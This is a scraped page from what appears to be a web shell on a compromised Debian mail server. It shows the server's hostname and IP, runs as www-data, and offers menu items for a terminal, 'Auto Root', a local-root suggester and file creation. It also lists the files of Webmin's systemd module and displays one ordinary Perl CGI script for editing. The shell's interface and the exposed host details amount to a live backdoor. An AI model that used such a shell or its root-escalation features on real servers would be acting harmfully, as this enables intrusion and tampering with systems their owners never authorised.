Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
webmin /
systemd /
Delete
Unzip
Name
Size
Permission
Date
Action
help
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
images
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
lang
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
acl_security.pl
2.79
KB
-rw-r--r--
2026-07-17 21:17
backup_config.pl
1.78
KB
-rw-r--r--
2026-07-17 21:17
config
315
B
-rw-r--r--
2026-07-17 21:17
config.info
885
B
-rw-r--r--
2026-07-17 21:17
config_info.pl
863
B
-rw-r--r--
2026-07-17 21:17
defaultacl
343
B
-rw-r--r--
2026-07-17 21:17
dropins.cgi
3.7
KB
-rwxr-xr-x
2026-07-17 21:22
edit_manual.cgi
2.3
KB
-rwxr-xr-x
2026-07-17 21:22
edit_unit.cgi
42.41
KB
-rwxr-xr-x
2026-07-17 21:22
index.cgi
16.66
KB
-rwxr-xr-x
2026-07-17 21:22
install_check.pl
404
B
-rw-r--r--
2026-07-17 21:22
log_parser.pl
3.42
KB
-rwxr-xr-x
2026-07-17 21:17
mass_units.cgi
13.28
KB
-rwxr-xr-x
2026-07-17 21:22
module.info
231
B
-rw-r--r--
2026-07-17 21:17
restart.cgi
884
B
-rwxr-xr-x
2026-07-17 21:22
restart_user.cgi
1.01
KB
-rwxr-xr-x
2026-07-17 21:22
safeacl
343
B
-rw-r--r--
2026-07-17 21:17
save_manual.cgi
1015
B
-rwxr-xr-x
2026-07-17 21:22
save_unit.cgi
29.34
KB
-rwxr-xr-x
2026-07-17 21:22
set_linger.cgi
1.54
KB
-rwxr-xr-x
2026-07-17 21:22
syslog_logs.pl
562
B
-rw-r--r--
2026-07-17 21:17
systemd-lib.pl
107.18
KB
-rw-r--r--
2026-07-17 21:17
Save
Rename
#!/usr/bin/perl # Reload a user's systemd manager after user unit-file changes. use strict; use warnings; require './systemd-lib.pl'; ## no critic our (%access, %in, %text); ReadParse(); error_setup($text{'reload_user_err'}); my $user = clean_unit_value($in{'user'}); my $uinfo = $user ? get_user_details($user) : undef; $uinfo || error($text{'systemd_euser'}); systemd_can_reload_user($uinfo->{'user'}) || systemd_acl_error('pmanual_user'); ui_print_unbuffered_header(undef, $text{'reload_user_title'}, ""); print text('reload_user_doing', ui_tag('tt', html_escape($uinfo->{'user'}))), ui_br(), "\n"; my ($ok, $out) = reload_user_manager($uinfo->{'user'}); print ui_tag('pre', html_escape($out)) if ($out); print($ok ? $text{'mass_ok'} : $text{'mass_failed'}, ui_p()); if ($ok) { mark_user_daemon_reloaded($uinfo->{'user'}); webmin_log("reload", "systemd-user", $uinfo->{'user'}, { 'user' => $uinfo->{'user'} }); } ui_print_footer("index.cgi?scope=user&unituser=".urlize($uinfo->{'user'}), $text{'index_return'});